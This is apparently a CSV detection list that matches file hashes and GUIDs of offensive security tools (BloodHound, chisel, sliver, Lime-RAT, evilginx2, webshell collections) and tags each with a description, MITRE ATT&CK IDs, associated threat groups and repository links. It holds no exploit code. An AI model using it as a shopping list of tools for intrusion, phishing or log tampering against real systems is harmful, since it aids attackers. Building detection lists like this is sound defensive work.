"*74dca5fb9ded47dcf5fb0d1a40dc68081e04c3f1fb66653abd671b39f3adb940*",".{0,1000}74dca5fb9ded47dcf5fb0d1a40dc68081e04c3f1fb66653abd671b39f3adb940.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","29072"
"*74e099d670bb7ddfbc574029735758bdd1e0abd82f7ab428fe2118a8459328c0*",".{0,1000}74e099d670bb7ddfbc574029735758bdd1e0abd82f7ab428fe2118a8459328c0.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","29075"
"*74e35d9c8f14042101ba70a5754c800de149c83d5ddfd2303f99fff92f7b4d7c*",".{0,1000}74e35d9c8f14042101ba70a5754c800de149c83d5ddfd2303f99fff92f7b4d7c.{0,1000}","offensive_tool_keyword","Bat-Potato","Automating Juicy Potato Local Privilege Escalation CMD exploit for penetration testers","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/0x4xel/Bat-Potato","1","0","#filehash","N/A","10","1","42","11","2022-12-13T20:19:51Z","2022-12-12T20:50:22Z","29076"
"*74f0a367e0af7a5885ece4682a8e1a07945893090ecf8c9677310954c7d9c479*",".{0,1000}74f0a367e0af7a5885ece4682a8e1a07945893090ecf8c9677310954c7d9c479.{0,1000}","offensive_tool_keyword","Sandman","Sandman is a NTP based backdoor for red team engagements in hardened networks.","T1105 - T1027 - T1071.001","TA0011 - TA0005","N/A","N/A","Persistence","https://github.com/Idov31/Sandman","1","0","#filehash","N/A","10","8","785","108","2024-03-31T17:40:15Z","2022-08-21T11:04:45Z","29077"
"*74f34d98822c40027fa388f51791cec58f2bf71c47936616eca08489a4493f61*",".{0,1000}74f34d98822c40027fa388f51791cec58f2bf71c47936616eca08489a4493f61.{0,1000}","offensive_tool_keyword","DRSAT","Disconnected RSAT is a launcher for the official Group Policy Manager - Certificate Authority and Certificate Templates snap-in to bypass the domain joined requirement that is needed when using the official MMC snap-in. The tool works by injecting a C# library into MMC that will hook the various API calls to trick MMC into believing that the logged on user is a domain user. attackers can abuse Disconnected RSAT to interact with Active Directory (AD) environments from non-domain-joined machines","T1559.001 - T1112 - T1078 - T1134.002 - T1055.001","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/DRSAT","1","0","#filehash","N/A","6","3","233","25","2024-12-27T11:44:18Z","2024-09-04T16:35:02Z","29078"
"*74f93a2398222f802089239c9610a21ea5ff34fb81cf6869f58bf5782ea5127f*",".{0,1000}74f93a2398222f802089239c9610a21ea5ff34fb81cf6869f58bf5782ea5127f.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","29079"
"*74fd341390aaee0b7dac4f892df392eadb934932bf7e6d6047ffcc8532df1f3d*",".{0,1000}74fd341390aaee0b7dac4f892df392eadb934932bf7e6d6047ffcc8532df1f3d.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","29081"
"*75007cb1974bca92234e5e178b17a429922c54676bc446d032464e358d26510a*",".{0,1000}75007cb1974bca92234e5e178b17a429922c54676bc446d032464e358d26510a.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","29082"
"*7504dee72e18b91d0f759f04385a968879699c228dae9c9a2c338dc7b76f3178*",".{0,1000}7504dee72e18b91d0f759f04385a968879699c228dae9c9a2c338dc7b76f3178.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","29083"
"*750674fbade92a723934ce273d69fb1000374997c7f19e7a5368916bd277ba00*",".{0,1000}750674fbade92a723934ce273d69fb1000374997c7f19e7a5368916bd277ba00.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","29084"
"*7506b958b82c26e3c9a5f11c36cc63c475434e28de8bd501d2823d0decba29ab*",".{0,1000}7506b958b82c26e3c9a5f11c36cc63c475434e28de8bd501d2823d0decba29ab.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","29085"
"*750b490f1788db4c843135e409ae3175cff1be5c61246341eabdfa135ac6c7e3*",".{0,1000}750b490f1788db4c843135e409ae3175cff1be5c61246341eabdfa135ac6c7e3.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","29086"
"*750de413f15ccf2befe7b1b298a3e4dcd7d226b7eb16ff4803dc4593d1faa320*",".{0,1000}750de413f15ccf2befe7b1b298a3e4dcd7d226b7eb16ff4803dc4593d1faa320.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","29087"
"*751381cb88f4fc0c53f9cdfca7a4d217121eef8defb5555728101e5e7d42161b*",".{0,1000}751381cb88f4fc0c53f9cdfca7a4d217121eef8defb5555728101e5e7d42161b.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","29088"
"*751456c943cbba46078f9443241a2b52f0dfcc47d876ec388213b4cba48ae654*",".{0,1000}751456c943cbba46078f9443241a2b52f0dfcc47d876ec388213b4cba48ae654.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","29089"
"*75216b97bd835abddaadc142f709b03fa70a513d3c37fa9a013ecb9536a92bb4*",".{0,1000}75216b97bd835abddaadc142f709b03fa70a513d3c37fa9a013ecb9536a92bb4.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","29091"
"*752b696841027c3767aa5d6582c03111e7fe0ab05f63905313ae7ce089e8e584*",".{0,1000}752b696841027c3767aa5d6582c03111e7fe0ab05f63905313ae7ce089e8e584.{0,1000}","offensive_tool_keyword","hak5 cloudc2","Cloud C2 makes it easy for pentesters and security teams to deploy and manage Hak5 gear from the cloud","T1021 - T1102 - T1213","TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://shop.hak5.org/products/c2?","1","0","#filehash","N/A","10","9","N/A","N/A","N/A","N/A","29093"
"*752c9bc83cd57649bece5f5885d921fa0dfd8cb62df66b6db1df281e51cdb560*",".{0,1000}752c9bc83cd57649bece5f5885d921fa0dfd8cb62df66b6db1df281e51cdb560.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","29094"
"*7531c23a8951439bfea1349ac6ad30a9bc5c1269718aaa7e320986a32cd05d30*",".{0,1000}7531c23a8951439bfea1349ac6ad30a9bc5c1269718aaa7e320986a32cd05d30.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","29095"
"*75374c3f9c0ddde44a47e4a780f2ee779e2a1350d8cbea052708b20cdd289599*",".{0,1000}75374c3f9c0ddde44a47e4a780f2ee779e2a1350d8cbea052708b20cdd289599.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","29098"
"*75389828365fcfac51834295aa9acffcd676181fbcee6301f1963662b6666407*",".{0,1000}75389828365fcfac51834295aa9acffcd676181fbcee6301f1963662b6666407.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","29099"
"*754ee0df79ed4346a364bb049f2fd1876287132af5d90a872d2de4dbe53c3c47*",".{0,1000}754ee0df79ed4346a364bb049f2fd1876287132af5d90a872d2de4dbe53c3c47.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","29102"
"*754f258d13d79689b39e46650ccdfbd876e8b2edb945ad5d749789b5161f0ff5*",".{0,1000}754f258d13d79689b39e46650ccdfbd876e8b2edb945ad5d749789b5161f0ff5.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","29103"
"*75574959bbdad4b4ac7b16906cd8f1fd855d2a7df8e63905ab18540e2d6f1600*",".{0,1000}75574959bbdad4b4ac7b16906cd8f1fd855d2a7df8e63905ab18540e2d6f1600.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","0","#filehash","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","29104"
"*755c1d8c2e4d58422ec4da20479b10857e1e556331af09975929d13b6b5cbd53*",".{0,1000}755c1d8c2e4d58422ec4da20479b10857e1e556331af09975929d13b6b5cbd53.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","29105"
"*755dfa63130b4daa2098ee3253b0532cf2bd5307e9036fa3cec74f9755b79601*",".{0,1000}755dfa63130b4daa2098ee3253b0532cf2bd5307e9036fa3cec74f9755b79601.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","29106"
"*75682eac28a36100019a0606879be2a615e6c221b212833b2eb9ab83f6360cd6*",".{0,1000}75682eac28a36100019a0606879be2a615e6c221b212833b2eb9ab83f6360cd6.{0,1000}","offensive_tool_keyword","PowerBruteLogon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/PowerBruteLogon","1","0","#filehash","N/A","8","2","124","22","2023-11-09T10:38:29Z","2021-12-01T09:40:22Z","29107"
"*757c6b973f06e169ec2346c818f211559a084fd2adaed2e0e9e232541b62b557*",".{0,1000}757c6b973f06e169ec2346c818f211559a084fd2adaed2e0e9e232541b62b557.{0,1000}","offensive_tool_keyword","pysecdump","Python-based tool to dump security information from Windows systems","T1003.001 - T1081 - T1012 - T1005 - T1518.001","TA0006 - TA0007 - TA0043","N/A","Dispossessor","Credential Access","https://github.com/pentestmonkey/pysecdump","1","0","#filehash","N/A","10","3","270","49","2020-06-22T04:16:16Z","2013-01-19T18:02:26Z","29108"
"*757d4c9ab64fbb35ad9fd0840e1f92b15b8f27047c700ab0a4329320203115fc*",".{0,1000}757d4c9ab64fbb35ad9fd0840e1f92b15b8f27047c700ab0a4329320203115fc.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","29109"
"*7582aa3ab9f635a0c3ef3522f9922e1628875fef425f81643ea7dd0ca9de68e0*",".{0,1000}7582aa3ab9f635a0c3ef3522f9922e1628875fef425f81643ea7dd0ca9de68e0.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","#filehash","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","29110"
"*75852d74cacf2d568b1729555ce3cf8814006764fe4580c6aa51c51427558534*",".{0,1000}75852d74cacf2d568b1729555ce3cf8814006764fe4580c6aa51c51427558534.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","29111"
"*758bfefdfa12df3438061e05f372c7ec5504e0f4374e3c5cc6b0222610ef7c12*",".{0,1000}758bfefdfa12df3438061e05f372c7ec5504e0f4374e3c5cc6b0222610ef7c12.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","29114"
"*758DB128-9123-4E1B-A6C3-47323714123A*",".{0,1000}758DB128\-9123\-4E1B\-A6C3\-47323714123A.{0,1000}","offensive_tool_keyword","RPC-Backdoor","A basic emulation of an ""RPC Backdoor""","T1071.004","TA0011","N/A","N/A","C2","https://github.com/eladshamir/RPC-Backdoor","1","0","#GUIDproject","N/A","10","10","240","45","2022-08-25T14:37:41Z","2022-08-16T13:12:05Z","29115"
"*758DB129-9123-4E1B-A6C3-47323714123A*",".{0,1000}758DB129\-9123\-4E1B\-A6C3\-47323714123A.{0,1000}","offensive_tool_keyword","RPC-Backdoor","A basic emulation of an ""RPC Backdoor""","T1071.004","TA0011","N/A","N/A","C2","https://github.com/eladshamir/RPC-Backdoor","1","0","#GUIDproject","N/A","10","10","240","45","2022-08-25T14:37:41Z","2022-08-16T13:12:05Z","29116"
"*759204cec7f9891cbc44845bb8fa9976691ed4be2d356db0d15226548e1dde4a*",".{0,1000}759204cec7f9891cbc44845bb8fa9976691ed4be2d356db0d15226548e1dde4a.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","29117"
"*75935a44f53a44754ff3972fdbc5f0e722ca7aad1f374953fc929c7083b5eae9*",".{0,1000}75935a44f53a44754ff3972fdbc5f0e722ca7aad1f374953fc929c7083b5eae9.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","29118"
"*759531afaa67180eb431415b0961e4da1792653b637edd0c97c086672cdbb2dd*",".{0,1000}759531afaa67180eb431415b0961e4da1792653b637edd0c97c086672cdbb2dd.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","29119"
"*7596c0126181b25c5c68fa91c28bc36d4054dfd94ec424d5209363496482511e*",".{0,1000}7596c0126181b25c5c68fa91c28bc36d4054dfd94ec424d5209363496482511e.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","29120"
"*7599c19b85ae59e83faafccf122bef1d93a0642018c4052b09a56dae06272311*",".{0,1000}7599c19b85ae59e83faafccf122bef1d93a0642018c4052b09a56dae06272311.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","29122"
"*75a064400fdf9acdbedb430ed009b961041fa379b4f219304477102f9f3d4281*",".{0,1000}75a064400fdf9acdbedb430ed009b961041fa379b4f219304477102f9f3d4281.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","29123"
"*75ae186f6b5f926d7d538642d1258d028eaf404859813c5a0ce53df00115d7ee*",".{0,1000}75ae186f6b5f926d7d538642d1258d028eaf404859813c5a0ce53df00115d7ee.{0,1000}","offensive_tool_keyword","Eventlogedit-evt--General","Remove individual lines from Windows Event Viewer Log (EVT) files","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evt--General","1","0","#filehash","N/A","9","1","44","9","2021-04-17T01:36:42Z","2018-07-23T01:19:03Z","29128"
"*75b1849a5f5a0c0ace9aee3df84be732f5145421c2ad91cf77933ceb0c5ef069*",".{0,1000}75b1849a5f5a0c0ace9aee3df84be732f5145421c2ad91cf77933ceb0c5ef069.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","29129"
"*75b44f98a090124d3b41ff610e5e10af410c5161c6a746703123a62a20854139*",".{0,1000}75b44f98a090124d3b41ff610e5e10af410c5161c6a746703123a62a20854139.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","29130"
"*75d0adaef55ce5b4670e7634d3f440e9d7e0eb1e04cb98c3919d0ad66dffbdfe*",".{0,1000}75d0adaef55ce5b4670e7634d3f440e9d7e0eb1e04cb98c3919d0ad66dffbdfe.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","29133"
"*75d5f38d2dd472c4d54999cf9b023c92ccb2f5806e78d610325707cb2b8aaa2f*",".{0,1000}75d5f38d2dd472c4d54999cf9b023c92ccb2f5806e78d610325707cb2b8aaa2f.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","#filehash","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","29135"
"*75dcce94ecc2df9392b92c2be705c72626a22c7c8fad662c8a1f3b4dba0228d8*",".{0,1000}75dcce94ecc2df9392b92c2be705c72626a22c7c8fad662c8a1f3b4dba0228d8.{0,1000}","offensive_tool_keyword","Invoke-RunAsWithCert","A PowerShell script to perform PKINIT authentication with the Windows API from a non domain-joined machine","T1550.003 - T1078 - T1027","TA0006 - TA0005","N/A","N/A","Lateral Movement","https://github.com/synacktiv/Invoke-RunAsWithCert","1","0","#filehash","N/A","8","2","150","14","2024-05-13T08:26:56Z","2024-05-03T12:44:21Z","29136"
"*75e1281a581e12bdec70ffa44dbe469847590eab3deddedfe2e6be0b91cf88c2*",".{0,1000}75e1281a581e12bdec70ffa44dbe469847590eab3deddedfe2e6be0b91cf88c2.{0,1000}","offensive_tool_keyword","ShellSync","exposing a server with suspicious scripts and executable from I-Am-Jakoby","T1059.003 - T1100  - T1027","TA0005 - TA0009 - TA0011 ","N/A","N/A","Data Exfiltration","https://github.com/I-Am-Jakoby/ShellSync","1","0","#filehash","N/A","5","1","20","7","2023-11-08T18:01:18Z","2023-11-06T06:05:11Z","29138"
"*75e28e8d08eada3a62ea3decfc6ce51717ef7b8ef581693d7d57111c514f00da*",".{0,1000}75e28e8d08eada3a62ea3decfc6ce51717ef7b8ef581693d7d57111c514f00da.{0,1000}","offensive_tool_keyword","Sublist3r","Sublist3r is a python tool designed to enumerate subdomains of websites using OSINT. It helps penetration testers and bug hunters collect and gather subdomains for the domain they are targeting. Sublist3r enumerates subdomains using many search engines such as Google. Yahoo. Bing. Baidu and Ask. Sublist3r also enumerates subdomains using Netcraft. Virustotal. ThreatCrowd. DNSdumpster and ReverseDNS. subbrute was integrated with Sublist3r to increase the possibility of finding more subdomains using bruteforce with an improved wordlist. The credit goes to TheRook who is the author of subbrute.","T1210.001 - T1190 - T1574.001","TA0007 - TA0002 - TA0010","N/A","ENERGETIC BEAR","Reconnaissance","https://github.com/aboul3la/Sublist3r","1","0","#filehash","N/A","5","10","10300","2148","2024-08-02T00:00:30Z","2015-12-15T00:55:25Z","29140"
